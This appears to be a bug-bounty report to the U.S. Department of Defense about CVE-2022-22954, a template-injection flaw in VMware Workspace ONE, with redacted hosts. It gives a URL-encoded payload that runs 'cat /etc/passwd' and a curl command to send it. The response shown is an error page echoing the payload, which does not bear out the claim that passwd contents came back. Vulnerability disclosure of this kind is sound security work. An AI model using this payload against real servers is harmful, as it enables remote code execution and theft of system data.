U.S. Dept Of Defense: ███ vulnerable to CVE-2022-22954

I found that one of the targets belongs to DOD vulnerable to CVE-2022-22954 where an attacker may be able to execute any malicious code like escalating Remote code execution is also possible

Technical Summary:

CVE-2022-22954 is a server-side template injection vulnerability in the VMware Workspace ONE Access and Identity Manager. This vulnerability was assigned a CVSSv3 score of 9.8. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager. Successful exploitation could result in remote code execution by exploiting a server-side template injection flaw.

Vulnerable URL:

███=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d

Impact

The impact of server-side template injection vulnerabilities is generally critical, resulting in remote code execution by taking full control of the back-end server. Even without the code execution, the attacker may be able to read sensitive data on the server

System Host(s)

██████, ████

Affected Product(s) and Version(s)

VMware workspace one

CVE Numbers

CVE-2022-22954

Steps to Reproduce

• Run the following curl command

Command Used:

curl -sk -X GET -H “Host: ██████” “█████████=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d”

Response:

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/html">
    <head>
        <title>Error Page</title>
        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
        <link rel="stylesheet" type="text/css" href="/catalog-portal/css/errorpage.css">
    </head>

    <body>
        <div>
            <div>
                <img src="/catalog-portal/app/graphics/warning.svg">
            </div>
            <div>Request Failed</div>
            <div>
                <p>Please contact your IT Administrator.</p>
                <a href="/catalog-portal/ui/logout?error=&deviceUdid=$%7B%22freemarker.template.utility.Execute%22?new()(%22cat%20/etc/passwd%22)%7D">Sign Out</a>
            </div>
        </div>
    &lt;/body&gt;
    &lt;script&gt;
        if(console && console.log) {
            console.log("auth.context.invalid");
            console.log("Authorization context is not valid. Login request  received with tenant code: uhhz-lbr-004v, device id: █████;
        }
    &lt;/script&gt;
&lt;/html&gt;

• As you can see the above response, which contains the response of /etc/passwd in the response

Suggested Mitigation/Remediation Actions

Upgrade the instances to the latest version